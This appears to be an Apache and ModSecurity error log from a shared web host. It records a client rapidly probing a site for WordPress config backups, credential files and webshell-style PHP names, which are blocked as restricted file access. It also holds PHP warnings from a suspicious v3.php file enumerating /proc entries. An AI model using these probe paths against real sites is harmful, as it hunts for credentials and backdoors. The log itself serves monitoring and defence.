[Tue May 12 07:20:28.741288 2026] [security2:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/backup.wp-config.php"] [unique_id "agK4nPaAnTZtx1_H_wzdBAAAAUY"]
[Tue May 12 07:20:28.741438 2026] [security2:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/backup.wp-config.php"] [unique_id "agK4nPaAnTZtx1_H_wzdBAAAAUY"]
[Tue May 12 07:20:28.741681 2026] [security2:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/backup.wp-config.php"] [unique_id "agK4nPaAnTZtx1_H_wzdBAAAAUY"]
[Tue May 12 07:20:28.951742 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/20.php
[Tue May 12 07:20:29.067252 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/upload_file.php
[Tue May 12 07:20:29.191590 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/aws.settings.php
[Tue May 12 07:20:29.306390 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/payout.php
[Tue May 12 07:20:29.471319 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/pqr.php
[Tue May 12 07:20:29.586278 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/phpinfo.php
[Tue May 12 07:20:29.712587 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/tmp.php
[Tue May 12 07:20:29.839154 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/456.php
[Tue May 12 07:20:29.980348 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/new2.php
[Tue May 12 07:20:30.006340 2026] [security2:error] [pid 1820198:tid 1820219] [client 43.156.109.53:52590] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/gaston/"] [unique_id "agK4ns1tk6y7yBJLpJpZYgAAAJM"]
[Tue May 12 07:20:30.095356 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/server.php
[Tue May 12 07:20:30.219308 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/extension-info.php
[Tue May 12 07:20:30.334134 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/conn_test.php
[Tue May 12 07:20:30.448909 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/information.php
[Tue May 12 07:20:30.563647 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/credentials.php
[Tue May 12 07:20:30.683038 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/phphph.php
[Tue May 12 07:20:30.797926 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/test-cgi.php
[Tue May 12 07:20:31.012640 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/twin.php
[Tue May 12 07:20:31.135196 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/pi.php7
[Tue May 12 07:20:31.250939 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/display_phpinfo.php
[Tue May 12 07:20:31.453932 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/webserver-info.php
[Tue May 12 07:20:31.648019 2026] [security2:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/new-wp-config.php"] [unique_id "agK4n_aAnTZtx1_H_wzdHwAAAUY"]
[Tue May 12 07:20:31.648169 2026] [security2:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/new-wp-config.php"] [unique_id "agK4n_aAnTZtx1_H_wzdHwAAAUY"]
[Tue May 12 07:20:31.648377 2026] [security2:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/new-wp-config.php"] [unique_id "agK4n_aAnTZtx1_H_wzdHwAAAUY"]
[Tue May 12 07:20:31.765129 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/env-info.php
[Tue May 12 07:20:31.880508 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/moderator.php
[Tue May 12 07:20:32.376493 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/23.php
[Tue May 12 07:20:32.506238 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/summary.php
[Tue May 12 07:20:32.623989 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/globals.php
[Tue May 12 07:20:32.738517 2026] [:error] [pid 1844863:tid 1844875] [client 172.212.217.10:16999] File does not exist: /home/sierraim/public_html/evil.php
PHP Warning:  filesize(): stat failed for /proc/1704986/task/1704986/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704986/task/1704986/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704986/task/1704986/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704986/task/1704986/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704986/task/1704986/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704986/task/1704986/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 07:20:54.510402 2026] [security2:error] [pid 1820198:tid 1820202] [client 43.130.101.151:51546] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/embed/"] [unique_id "agK4ts1tk6y7yBJLpJpZlwAAAII"]
[Tue May 12 07:20:58.066052 2026] [security2:error] [pid 1825179:tid 1825205] [client 43.130.101.151:56346] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agK4utr1yOh9TvizezjChAAAAEc"], referer: https://rentparadise.fr/embed/
[Tue May 12 07:21:34.585243 2026] [security2:error] [pid 1825179:tid 1825206] [client 43.130.150.80:33770] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK43tr1yOh9TvizezjCzQAAAEg"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https://planetagraf.com
[Tue May 12 07:22:30.057292 2026] [security2:error] [pid 1820198:tid 1820213] [client 40.77.167.151:25290] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.jeanboyault.fr"] [uri "/wp-content/languages/%5$s"] [unique_id "agK5Fs1tk6y7yBJLpJpavAAAAI0"]
[Tue May 12 07:22:38.909602 2026] [security2:error] [pid 1842385:tid 1842414] [client 43.157.179.227:55104] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/wp-content/uploads/2023/08/muzungu_2661bfc3-0c04-448c-a8b0-06711a3367d8_943x-300x300.webp"] [unique_id "agK5Hhs7kySIUZ3ORnJMDQAAARc"]
[Tue May 12 07:23:21.597560 2026] [:error] [pid 1825179:tid 1825222] [client 114.119.140.137:38717] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/tag/alpes-francaise/
[Tue May 12 07:24:32.310037 2026] [security2:error] [pid 1825287:tid 1825309] [client 185.213.246.186:51693] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK5kAgpmE1yW0glLdhR2QAAAMQ"], referer: https://www.piregwan-genesis.com/
[Tue May 12 07:25:38.922780 2026] [security2:error] [pid 1844863:tid 1844893] [client 180.153.236.83:33719] ModSecurity: Warning. Matched phrase "user-agent:" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "33"] [id "913100"] [rev "2"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: user-agent: found within REQUEST_HEADERS:User-Agent: user-agent:mozilla/5.0 (linux; android 10; k) applewebkit/537.36 (khtml, like gecko) chrome/131.0.0.0 mobile safari/537.36; 360spider"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agK50vaAnTZtx1_H_wzfWwAAAVg"], referer: https://www.tchatbooster.com/
[Tue May 12 07:25:38.923622 2026] [security2:error] [pid 1844863:tid 1844893] [client 180.153.236.83:33719] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agK50vaAnTZtx1_H_wzfWwAAAVg"], referer: https://www.tchatbooster.com/
[Tue May 12 07:25:39.444706 2026] [security2:error] [pid 1844863:tid 1844893] [client 180.153.236.83:33719] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Found User-Agent associated with security scanner"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agK50vaAnTZtx1_H_wzfWwAAAVg"], referer: https://www.tchatbooster.com/
[Tue May 12 07:27:30.609765 2026] [security2:error] [pid 1844863:tid 1844879] [client 43.134.33.236:52568] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.of-crystal-lake.net"] [uri "/page.php"] [unique_id "agK6QvaAnTZtx1_H_wzgVQAAAUo"]
[Tue May 12 07:27:36.696907 2026] [core:error] [pid 1825287:tid 1825315] [client 4.193.137.131:5521] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:36.696941 2026] [core:error] [pid 1825287:tid 1825315] [client 4.193.137.131:5521] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:36.900953 2026] [authz_core:error] [pid 1825287:tid 1825329] [client 216.73.216.110:24201] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/blog/error_log
[Tue May 12 07:27:37.172946 2026] [core:error] [pid 1844863:tid 1844891] [client 4.193.137.131:5519] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:37.172992 2026] [core:error] [pid 1844863:tid 1844891] [client 4.193.137.131:5519] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:37.654682 2026] [core:error] [pid 1820198:tid 1820212] [client 4.193.137.131:5533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:37.654711 2026] [core:error] [pid 1820198:tid 1820212] [client 4.193.137.131:5533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:38.131478 2026] [core:error] [pid 1842385:tid 1842405] [client 4.193.137.131:5518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:38.131520 2026] [core:error] [pid 1842385:tid 1842405] [client 4.193.137.131:5518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:38.607597 2026] [core:error] [pid 1825287:tid 1825320] [client 4.193.137.131:5513] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:38.607620 2026] [core:error] [pid 1825287:tid 1825320] [client 4.193.137.131:5513] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:39.083052 2026] [core:error] [pid 1842385:tid 1842404] [client 4.193.137.131:5505] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:39.083080 2026] [core:error] [pid 1842385:tid 1842404] [client 4.193.137.131:5505] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:39.558789 2026] [core:error] [pid 1825179:tid 1825205] [client 4.193.137.131:5506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:39.558822 2026] [core:error] [pid 1825179:tid 1825205] [client 4.193.137.131:5506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:40.034252 2026] [core:error] [pid 1825287:tid 1825310] [client 4.193.137.131:5508] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:40.034286 2026] [core:error] [pid 1825287:tid 1825310] [client 4.193.137.131:5508] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:40.538607 2026] [core:error] [pid 1844863:tid 1844876] [client 4.193.137.131:5532] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:40.538634 2026] [core:error] [pid 1844863:tid 1844876] [client 4.193.137.131:5532] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:41.028534 2026] [core:error] [pid 1825179:tid 1825212] [client 4.193.137.131:5515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:41.028565 2026] [core:error] [pid 1825179:tid 1825212] [client 4.193.137.131:5515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:41.525191 2026] [core:error] [pid 1844863:tid 1844873] [client 4.193.137.131:5515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:41.525218 2026] [core:error] [pid 1844863:tid 1844873] [client 4.193.137.131:5515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:42.000003 2026] [core:error] [pid 1825179:tid 1825208] [client 4.193.137.131:5529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:42.000044 2026] [core:error] [pid 1825179:tid 1825208] [client 4.193.137.131:5529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:42.484512 2026] [core:error] [pid 1825287:tid 1825305] [client 4.193.137.131:5529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:42.484550 2026] [core:error] [pid 1825287:tid 1825305] [client 4.193.137.131:5529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:43.067714 2026] [core:error] [pid 1825179:tid 1825218] [client 4.193.137.131:5895] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:43.067742 2026] [core:error] [pid 1825179:tid 1825218] [client 4.193.137.131:5895] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:43.574294 2026] [core:error] [pid 1825287:tid 1825327] [client 4.193.137.131:5551] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:43.574334 2026] [core:error] [pid 1825287:tid 1825327] [client 4.193.137.131:5551] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:44.074144 2026] [core:error] [pid 1844863:tid 1844880] [client 4.193.137.131:5514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:44.074177 2026] [core:error] [pid 1844863:tid 1844880] [client 4.193.137.131:5514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:44.568810 2026] [core:error] [pid 1825287:tid 1825316] [client 4.193.137.131:5517] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:44.568835 2026] [core:error] [pid 1825287:tid 1825316] [client 4.193.137.131:5517] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:45.060867 2026] [core:error] [pid 1844863:tid 1844893] [client 4.193.137.131:5537] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:45.060902 2026] [core:error] [pid 1844863:tid 1844893] [client 4.193.137.131:5537] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:45.557813 2026] [core:error] [pid 1825179:tid 1825213] [client 4.193.137.131:5950] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:45.557840 2026] [core:error] [pid 1825179:tid 1825213] [client 4.193.137.131:5950] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:27:46.056833 2026] [core:error] [pid 1820198:tid 1820222] [client 4.193.137.131:5555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
